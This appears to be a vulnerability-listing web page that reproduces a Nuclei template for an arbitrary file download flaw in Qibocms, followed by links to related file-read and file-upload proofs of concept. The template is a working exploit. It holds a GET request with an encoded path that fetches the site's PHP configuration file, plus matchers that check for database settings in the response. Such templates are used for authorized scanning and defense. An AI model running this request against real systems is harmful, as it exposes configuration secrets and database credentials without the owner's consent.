qibocms-file-download: Qibocms - Arbitrary File Download

漏洞描述

PoC代码[已公开]

id: qibocms-file-download

info:
  name: Qibocms - Arbitrary File Download
  author: theabhinavgaur
  severity: high
  description: Qibocms is vulnerable to arbitrary file download vulnerability.
  metadata:
    verified: true
    max-request: 1
  tags: qibocms,lfr,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<?php"
          - "$webdb"
        condition: and

      - type: word
        part: header
        words:
          - "filename=config"

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210081102e77322580e14888ceb9fec96a2534127f46ecbeb9881da943cf43f6d86e022100d8d0886b12699c778b9e86ef12be05ede694bc00e5e1ceee922cbf43b423fe0b:922c64590222798bb761d5b6d8e72950

相关漏洞推荐

• KINGOSOFT高校智慧校园教学综合服务平台 /jw/lessonchangeapply/jwComFileDownload.action 文件读取漏洞
• POC CVE-2025-64095: DNN - Unrestricted Arbitrary File Upload
• POC 富勒仓储管理系统 getDownloadFileAction 任意文件读取漏洞
• 富勒仓储管理系统 getDownloadFileAction 存在任意文件读取漏洞
• CVE-2019-11510: Pulse Connect Secure SSL VPN Arbitrary File Read
• CVE-2019-19985: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
• huatiandongli-ntkodownload-fileread: 华天动力 ntkoDownload 任意文件读取
• huatiandongli-templateservice-fileread: 华天动力 ntkoDownload 任意文件读取
• nacos-unauthorized-config-download: Nacos 未授权下载配置信息
• pbootcms-database-file-download: Pbootcms Database File Download
• qibo-cms-job-file-read: Qibo CMS Job File Read
• solr-file-read: Apache Solr <= 8.8.1 Arbitrary File Read
• yonyou-nc-arbitrary-file-upload: Yonyou NC Arbitrary file upload